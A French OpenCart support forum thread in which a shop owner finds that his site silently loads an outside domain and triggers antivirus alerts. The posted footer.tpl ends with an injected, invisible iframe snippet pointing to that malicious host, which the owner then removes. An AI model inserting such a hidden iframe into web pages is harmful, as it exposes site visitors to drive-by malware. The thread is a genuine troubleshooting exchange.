Nous ne répondons seulement qu'aux sujets dont l'auteur a complété sa signature [Lire]



Vous avez des soucis avec votre Opencart v1.5.x, nous pouvons résoudre vos problèmes,
contactez le Bureau France !

par tel: 0 891 690 175 ou par
email

Qu'est-ce-que pizda.changeip ?

Inscrire dans ce forum tous les types de problèmes que vous rencontrez avec OpenCart

Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 04 Mai 2012, 09:08

Bonjour,

Lorsque j'ouvre mon site via ie, la page s'ouvre sans erreurs mais lorsque je regarde l'historique, je vois qu'avant d'ouvrir ma page, ie ouvre d'abord pizda.changeip.name/ .... Qu'est-ce-que c'est que ca ? Pouvez-vous m'aider cela devient urgent. Mon site est isauto.fr.

Lorsque j'ouvre le site via firefox, alors là j'ai une alerte virus...

Que dois-je faire ?

Merci d'avanceALPINE57

Posts: 3
Joined: Mon Apr 23, 2012 6:29 pm
Private message
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 6
Inscription: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar LeorLindel » 04 Mai 2012, 09:12

Bonjour,
alpine57 a écrit:Que dois-je faire ?

Déjà dans un premier temps, compléter ta signature suivants les points importants composant la mienne, après nous pourrons voir.

Je t'en remercie.
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4227
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 13:12

Bonjour,

Merci pour l'info. Je viens de mettre à jour ma signature. Je suis novice, je m'excuse d'avance s'ils manquent des infos.

Alpine57
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 6
Inscription: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar LeorLindel » 05 Mai 2012, 13:23

As-tu mis un template ou as-tu modifié le thème par défaut par toi-même ou par un tiers ?
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4227
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 15:05

Un ami a modifié le theme par défaut en enlevant quelques boutons par-cis par là.
Le problème est apparu subitement, du jour au lendemain. Tout allait bien il y a un mois.

Merci
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 6
Inscription: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar LeorLindel » 05 Mai 2012, 15:18

Pourrais-tu poster (dans les balises destinées à cet effet) ton fichier catalog/view/theme/default/template/common/footer.tpl
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4227
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 16:22

La partie <---qpi--> s'insère automatiquement et contre ma volonté dans mes pages. Je constate qu'il y en a aussi dans mon footer.tpl ...

Voici le code :

Code: Tout sélectionner
<div id="footer">

  <div class="column1">
    <a href="<?php echo $home; ?>"><?php echo $text_home; ?></a>
    <a href="/index.php?route=information/information&information_id=6"><?php echo $text_about; ?></a>
    <a href="/index.php?route=product/category&path=71"><?php echo $text_cars; ?></a>
    <a href="/index.php?route=information/information&information_id=7"><?php echo $text_hours; ?></a>
    <a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a>
    <a href="/index.php?route=information/information&information_id=8"><?php echo $text_map; ?></a>
  </div>
 
 
<!--
  <div class="column1">
      <?php foreach ($informations as $information) { ?>
      <a href="<?php echo $information['href']; ?>"><?php echo $information['title']; ?></a>
      <?php } ?>
      <a href="<?php echo $sitemap; ?>"><?php echo $text_sitemap; ?></a>
      <a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a>
  </div>


  <div class="column">
    <h3><?php echo $text_information; ?></h3>
    <ul>
      <?php foreach ($informations as $information) { ?>
      <li><a href="<?php echo $information['href']; ?>"><?php echo $information['title']; ?></a></li>
      <?php } ?>
    </ul>
  </div>
 
  <div class="column">
    <h3><?php echo $text_service; ?></h3>
    <ul>
      <li><a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a></li>
      <li><a href="<?php echo $return; ?>"><?php echo $text_return; ?></a></li>
      <li><a href="<?php echo $sitemap; ?>"><?php echo $text_sitemap; ?></a></li>
    </ul>
  </div>
 
  <div class="column">
    <h3><?php echo $text_extra; ?></h3>
    <ul>
      <li><a href="<?php echo $manufacturer; ?>"><?php echo $text_manufacturer; ?></a></li>
      <li><a href="<?php echo $voucher; ?>"><?php echo $text_voucher; ?></a></li>
      <li><a href="<?php echo $affiliate; ?>"><?php echo $text_affiliate; ?></a></li>
      <li><a href="<?php echo $special; ?>"><?php echo $text_special; ?></a></li>
    </ul>
  </div>
 
  <div class="column">
    <h3><?php echo $text_account; ?></h3>
    <ul>
      <li><a href="<?php echo $account; ?>"><?php echo $text_account; ?></a></li>
      <li><a href="<?php echo $order; ?>"><?php echo $text_order; ?></a></li>
      <li><a href="<?php echo $wishlist; ?>"><?php echo $text_wishlist; ?></a></li>
      <li><a href="<?php echo $newsletter; ?>"><?php echo $text_newsletter; ?></a></li>
    </ul>
  </div>
  -->
</div>
<!--
OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donatation.
Please donate via PayPal to donate@opencart.com
//-->
<div id="powered"><?php echo $powered; ?></div>
<!--
OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donatation.
Please donate via PayPal to donate@opencart.com
//-->
</div>









<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://pizda.changeip.name/?f=997710   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi-->
</body></html>
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 6
Inscription: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 16:49

J'ai oté le code entre les balises qpi du fichier footer.tpl. C'est ok pour le moment le code qpi ne réapparait pas.

merci
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 6
Inscription: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar LeorLindel » 05 Mai 2012, 17:37

Si ton problème est résolu, je te demande de bien vouloir mettre l'icône de résolution Image dans le titre initial de ton sujet.

Je t'en remercie.
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4227
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 17:39

oui merci de m'avoir donné une piste.
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 6
Inscription: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar LeorLindel » 05 Mai 2012, 17:56

De rien.

Comme je te l'ai dit dans mon précédent message, l'icône se met dans le titre initial (c'est même mis en effet clignotant dans l'en-tête de la rédaction des messages afin que cela se voit bien !).
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4227
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce


Retourner vers Rapports de Problèmes

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités

cron